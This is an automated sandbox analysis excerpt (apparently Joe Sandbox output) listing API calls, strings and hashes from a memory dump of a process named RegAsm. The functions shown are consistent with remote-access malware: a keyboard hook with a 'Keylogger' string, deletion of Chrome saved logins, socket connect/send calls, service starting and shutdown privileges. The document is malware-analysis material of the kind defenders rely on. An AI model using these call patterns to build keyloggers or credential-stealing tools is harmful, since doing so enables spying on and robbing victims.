                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                            • String ID: lJD$lJD$lJD
                                                                                                                            • API String ID: 745075371-479184356
                                                                                                                            • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                            • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                                                                                                                            • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                                                                                                                            • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C2EC
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C31C
                                                                                                                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C38E
                                                                                                                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C39B
                                                                                                                              • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C371
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3BC
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D2
                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3D9
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,004752D8,004752F0,00000001), ref: 0041C3E2
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2341273852-0
                                                                                                                            • Opcode ID: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                                                                            • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                                                                                                                            • Opcode Fuzzy Hash: 7754893f2187ba533a154fe4103e102bcae7ebd53560a2043af222d2c338aa0a
                                                                                                                            • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                                                                                                                            APIs
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                                                                                                                              • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Find$CreateFirstNext
                                                                                                                            • String ID: 8SG$PXG$PXG$NG$PG
                                                                                                                            • API String ID: 341183262-3812160132
                                                                                                                            • Opcode ID: 90553e5a83a2dd173b6d5c91e12f2f2dd6812d2a12b18b35586f7458d1925955
                                                                                                                            • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                                                                                                                            • Opcode Fuzzy Hash: 90553e5a83a2dd173b6d5c91e12f2f2dd6812d2a12b18b35586f7458d1925955
                                                                                                                            • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                                                                                                            • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                                                                                                            • GetLastError.KERNEL32 ref: 0040A2ED
                                                                                                                              • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                                                            • GetMessageA.USER32 ref: 0040A33B
                                                                                                                            • TranslateMessage.USER32(?), ref: 0040A34A
                                                                                                                            • DispatchMessageA.USER32(?), ref: 0040A355
                                                                                                                            Strings
                                                                                                                            • Keylogger initialization failure: error , xrefs: 0040A301
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                            • String ID: Keylogger initialization failure: error
                                                                                                                            • API String ID: 3219506041-952744263
                                                                                                                            • Opcode ID: 83cf61fcc4db7adf9d4bbc8500479a2a59ba994a5a836eeaba27c80e8cfaac76
                                                                                                                            • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                                                                                                            • Opcode Fuzzy Hash: 83cf61fcc4db7adf9d4bbc8500479a2a59ba994a5a836eeaba27c80e8cfaac76
                                                                                                                            • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1888522110-0
                                                                                                                            • Opcode ID: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                                                                            • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                                                                                                            • Opcode Fuzzy Hash: cc4c28d987af9ed77b60558391ff2640f7f7fc81cb6ffa0e765e100d0ff3e66e
                                                                                                                            • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                                                                                                            APIs
                                                                                                                            • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 004140A9
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                            • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                            • API String ID: 2127411465-314212984
                                                                                                                            • Opcode ID: a4f849b2b5db47811b40edba2969bc8ccf5af81e9b2106660676366c5f772689
                                                                                                                            • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                                                                                                            • Opcode Fuzzy Hash: a4f849b2b5db47811b40edba2969bc8ccf5af81e9b2106660676366c5f772689
                                                                                                                            • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                                                                                                            APIs
                                                                                                                            • _free.LIBCMT ref: 00449212
                                                                                                                            • _free.LIBCMT ref: 00449236
                                                                                                                            • _free.LIBCMT ref: 004493BD
                                                                                                                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                                                                                                            • _free.LIBCMT ref: 00449589
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 314583886-0
                                                                                                                            • Opcode ID: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                                                                                            • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                                                                                                            • Opcode Fuzzy Hash: 9cd240c025cd7d498dafe0f0be125a30ff36c68caa35d7d10d4c95a756b7505e
                                                                                                                            • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                                                              • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                                                              • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                                                              • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                                                              • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                                                                                                            • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                                                                                                            • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                                                                            • String ID: !D@$PowrProf.dll$SetSuspendState
                                                                                                                            • API String ID: 1589313981-2876530381
                                                                                                                            • Opcode ID: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                                                                            • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                                                                                                            • Opcode Fuzzy Hash: 808f25f0b35ca0a049c08b025eaa36e97cdb378869ef4b72705573af330ecb01
                                                                                                                            • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                                                                                                            • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID: ACP$OCP$['E
                                                                                                                            • API String ID: 2299586839-2532616801
                                                                                                                            • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                            • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                                                                                                            • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                                                                                                            • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                                                                                                            APIs
                                                                                                                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                                                                                                            • GetLastError.KERNEL32 ref: 0040BA58
                                                                                                                            Strings
                                                                                                                            • UserProfile, xrefs: 0040BA1E
                                                                                                                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                                                                                                            • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                                                                                                            • [Chrome StoredLogins not found], xrefs: 0040BA72
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                            • API String ID: 2018770650-1062637481
                                                                                                                            • Opcode ID: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                                                                            • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                                                                                                            • Opcode Fuzzy Hash: 008ec232383838ba67865b61595300985ebead86482bee1f0298aab426d5d3e8
                                                                                                                            • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                                                                                                            APIs
                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                                                                                                            • GetLastError.KERNEL32 ref: 0041799D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                                                            • String ID: SeShutdownPrivilege
                                                                                                                            • API String ID: 3534403312-3733053543
                                                                                                                            • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                                            • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                                                                                                            • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                                                                                                            • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: __floor_pentium4
                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                            • Opcode ID: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                                                                                                            • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                                                                                                                            • Opcode Fuzzy Hash: df2971786bbf8e496eef17942e665dfb4286cfe499c735b5cf4645abbbd9631d
                                                                                                                            • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00409258
                                                                                                                              • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,01ED4948,00000010), ref: 004048E0
                                                                                                                              • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004093C1
                                                                                                                              • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                                                                                              • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                                                                                              • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                                                                                            • FindClose.KERNEL32(00000000), ref: 004095B9
                                                                                                                              • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                                                                                              • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1824512719-0
                                                                                                                            • Opcode ID: c7de4f61046b419b7d60b320620ab96204627393e145c75f5e4fad2f3aeaf2eb
                                                                                                                            • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                                                                                                            • Opcode Fuzzy Hash: c7de4f61046b419b7d60b320620ab96204627393e145c75f5e4fad2f3aeaf2eb
                                                                                                                            • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                                                                                                            APIs
                                                                                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                                                                                                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                                                                                                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Service$CloseHandle$Open$ManagerStart
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 276877138-0
                                                                                                                            • Opcode ID: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                                                                            • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                                                                                                                            • Opcode Fuzzy Hash: 55aea4e01c19578bfbdca94b163ddb40001bd342cd849d2c6829f49351802c7e
                                                                                                                            • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F3DE,00000000), ref: 0041B4B9
                                                                                                                            • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                                                                                                                            • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                                                                                                                            • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID: SETTINGS
                                                                                                                            • API String ID: 3473537107-594951305
                                                                                                                            • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                            • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                                                                                                                            • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                                                                                                                            • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040966A
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                                                                                                                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000009.00000002.886489117.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000009.00000002.886489117.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$File$CloseFirstH_prologNext
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1157919129-0
                                                                                                                            • Opcode ID: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                                                                                                                            • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                                                                                                                            • Opcode Fuzzy Hash: 00f782369a89d33849f7f6744ff3d95afce15a7ce25431a6756746a16509b34f
                                                                                                                            • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 00408811
                                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                                                                                                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                                                                                                            Memory Dump Source
